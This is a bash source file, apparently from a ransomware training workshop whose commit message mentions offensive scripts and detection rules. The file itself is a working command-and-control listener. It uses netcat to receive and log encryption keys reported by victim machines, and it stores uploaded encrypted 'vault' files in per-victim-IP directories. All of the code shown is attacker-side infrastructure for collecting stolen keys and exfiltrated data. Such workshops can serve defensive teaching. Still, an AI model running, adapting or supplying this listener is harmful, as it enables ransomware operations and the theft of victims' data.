anti ae0104b200 add QueComanTierra LOLBin ransomware workshop
Scripts ofensivos (xargs, tarbulk, noxargs), C2 listener, Falco
detection rules, slides md + pptx, y estructura del workshop.
2026-05-19 09:42:02 -04:00


#!/bin/bash
# C2 listener:
# GET /?k=KEY&v=VICTIM_IP -> loggea clave
# POST /vault/VICTIM_IP -> guarda .vault.enc en vaults/VICTIM_IP/
# Port taken from the first CLI argument (default 9090).
PORT=${1:-9090}
# Append-only log shared by both handlers, and the directory that receives
# one sub-directory per reporting host.
LOG="stolen_keys.log"
VAULTS_DIR="vaults"
# Canned response sent back on every connection.  printf -v expands the \r\n
# escapes, so the bytes are the same as the $'...' form.
printf -v HTTP_200 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n'
mkdir -p -- "$VAULTS_DIR"
#######################################
# Records the key reported by a GET request.
# Globals:   LOG (appended)
# Arguments: $1 - request URL, expected as /?k=KEY&v=VICTIM_IP
# Outputs:   one log line to stdout and to $LOG; nothing when no k= is present
#######################################
handle_get() {
  local url=$1
  local key victim stamp
  # Values of the k= and v= query parameters (everything up to the next & or
  # space).  NOTE: -P (PCRE lookbehind) requires GNU grep.
  key=$(grep -oP '(?<=k=)[^& ]+' <<< "$url")
  victim=$(grep -oP '(?<=v=)[^& ]+' <<< "$url")
  # A request without a key is not logged at all.
  if [[ -z "$key" ]]; then
    return
  fi
  stamp=$(date '+%Y-%m-%d %H:%M:%S')
  printf '%s\n' "[+] $stamp victim=$victim key=$key" | tee -a "$LOG"
}
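#######################################
# Stores the body of a POST /vault/VICTIM_IP request as a vault file.
# Globals:   VAULTS_DIR (read), LOG (appended)
# Arguments: $1 - file holding the raw HTTP request (headers + body)
#            $2 - request URL, expected as /vault/VICTIM_IP
# Outputs:   writes $VAULTS_DIR/VICTIM_IP/.vault.enc; one log line to stdout
#            and to $LOG
# Returns:   0 when the body was stored, 1 when the header/body separator
#            could not be found (nothing is written in that case)
#######################################
handle_post() {
  local tmpfile=$1 url=$2
  local victim victim_dir offset body_start size stamp
  victim=$(grep -oP '(?<=/vault/)[^/ ]+' <<< "$url")
  # The name comes from the peer and becomes a directory component.  The
  # regex already excludes "/", but "." and ".." would still place the file
  # outside $VAULTS_DIR (/vault/.. writes next to the script), so they are
  # treated like a missing name.
  case "$victim" in
    ''|.|..) victim="unknown" ;;
  esac
  victim_dir="$VAULTS_DIR/$victim"
  mkdir -p -- "$victim_dir"
  # Byte offset of the blank line (a lone CR) that terminates the HTTP headers.
  # grep splits a pattern containing real newlines into several patterns, so a
  # literal $'\r\n\r\n' would only ever find the first CR of the request line;
  # matching the blank line itself avoids that.  -m1 stops at the first hit,
  # -a keeps grep from treating the binary body as non-text.
  offset=$(grep -boa -m1 $'^\r$' "$tmpfile" 2>/dev/null | cut -d: -f1)
  if [[ -z "$offset" ]]; then
    printf '%s\n' "[-] separador no encontrado en request de $victim" >&2
    return 1
  fi
  # 0-based offset of the first body byte: skip the CR LF of the blank line.
  body_start=$(( offset + 2 ))
  # tail -c +N is 1-based and copies in blocks, unlike dd bs=1 byte by byte.
  tail -c "+$(( body_start + 1 ))" -- "$tmpfile" > "$victim_dir/.vault.enc"
  if size=$(wc -c < "$victim_dir/.vault.enc" 2>/dev/null); then
    size=${size//[[:space:]]/}   # BSD wc pads the count with spaces
  else
    size="?"
  fi
  stamp=$(date '+%Y-%m-%d %H:%M:%S')
  printf '%s\n' "[+] $stamp vault=$victim_dir/.vault.enc size=${size}B" | tee -a "$LOG"
}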
#######################################
# Dispatches one stored HTTP request on its method (GET or POST).
# Arguments: $1 - file holding the raw HTTP request
# Outputs:   whatever handle_get / handle_post print; an error line on stderr
#            for any other method
#######################################
handle_connection() {
  local tmpfile=$1
  local request_line method url rest
  # Only the request line (first line of the file) is needed to dispatch.
  request_line=$(head -1 "$tmpfile")
  # Fields are blank-separated: METHOD URL VERSION.  When the line has no
  # further fields the trailing CR sticks to the method, so strip it.
  read -r method url rest <<< "$request_line"
  method=${method//$'\r'/}
  if [[ "$method" == GET ]]; then
    handle_get "$url"
  elif [[ "$method" == POST ]]; then
    handle_post "$tmpfile" "$url"
  else
    printf '%s\n' "[-] metodo desconocido: $method" >&2
  fi
}
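#######################################
# Serves the key-reporting endpoint: answers every connection with $HTTP_200
# and hands the request URL to handle_get.  Loops until the process is killed.
# Globals:   PORT (read; 9090 when unset), HTTP_200 (read)
# Outputs:   startup banner and handle_get's log lines to stdout
# Returns:   1 only if the temp file cannot be created; otherwise never returns
#######################################
key_listener() {
  # The port from the command line was stored in PORT but never used; honor it
  # here, keeping 9090 as the fallback.
  local port=${PORT:-9090}
  local tmpfile
  tmpfile=$(mktemp) || return 1
  # Single quotes: the expansion happens when the trap fires, not when set.
  trap 'rm -f -- "$tmpfile"' EXIT
  printf '%s\n' "[*] Keys en :$port"
  while true; do
    # nc replies with the canned response and stores the whole request.
    if ! printf '%s' "$HTTP_200" | nc -nlvp "$port" > "$tmpfile" 2>/dev/null; then
      # Port in use, nc missing, ...: without a pause a persistent failure
      # spins this loop at full speed.  The (then empty) request is still
      # handled below; handle_get ignores a request without a key.
      printf '%s\n' "[-] nc termino con error en :$port" >&2
      sleep 1
    fi
    handle_get "$(awk 'NR==1{print $2}' "$tmpfile")"
  done
}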
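#######################################
# Serves the vault-upload endpoint on :9091: answers every connection with
# $HTTP_200 and hands the stored request to handle_post.  Loops until killed.
# Globals:   HTTP_200 (read)
# Outputs:   startup banner and handle_post's log lines to stdout
# Returns:   1 only if the temp file cannot be created; otherwise never returns
#######################################
vault_listener() {
  local port=9091
  local tmpfile url
  tmpfile=$(mktemp) || return 1
  # Single quotes: the expansion happens when the trap fires, not when set.
  trap 'rm -f -- "$tmpfile"' EXIT
  printf '%s\n' "[*] Vaults en :$port"
  while true; do
    # nc replies with the canned response and stores the whole request.
    if ! printf '%s' "$HTTP_200" | nc -nlvp "$port" > "$tmpfile" 2>/dev/null; then
      # Port in use, nc missing, ...: without a pause a persistent failure
      # spins this loop at full speed.  The (then empty) request is still
      # handled below, as before.
      printf '%s\n' "[-] nc termino con error en :$port" >&2
      sleep 1
    fi
    url=$(awk 'NR==1{print $2}' "$tmpfile")
    handle_post "$tmpfile" "$url"
  done
}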
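#######################################
# Entry point: runs the key listener in the background and the vault
# listener in the foreground.
# Globals:   LOG, VAULTS_DIR (read for the banner)
# Returns:   1 when nc is not installed; otherwise runs until interrupted
#######################################
main() {
  local key_pid
  # Both listeners are built on nc; fail early instead of looping on a
  # missing binary.
  if ! command -v nc >/dev/null 2>&1; then
    printf '%s\n' "[-] nc no esta instalado" >&2
    return 1
  fi
  printf '%s\n' "[*] C2 iniciado. Logs en $LOG, vaults en $VAULTS_DIR/"
  key_listener &
  key_pid=$!
  # A job started with & in a non-interactive shell ignores SIGINT, so Ctrl-C
  # would stop the vault listener but leave key_listener running.  INT/TERM
  # are used (not EXIT) because vault_listener installs its own EXIT trap in
  # this shell; the explicit exit makes that EXIT trap run afterwards.
  trap 'kill "$key_pid" 2>/dev/null; exit 130' INT
  trap 'kill "$key_pid" 2>/dev/null; exit 143' TERM
  vault_listener
}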
# Script entry; main takes no arguments but forwarding them is conventional.
main "$@"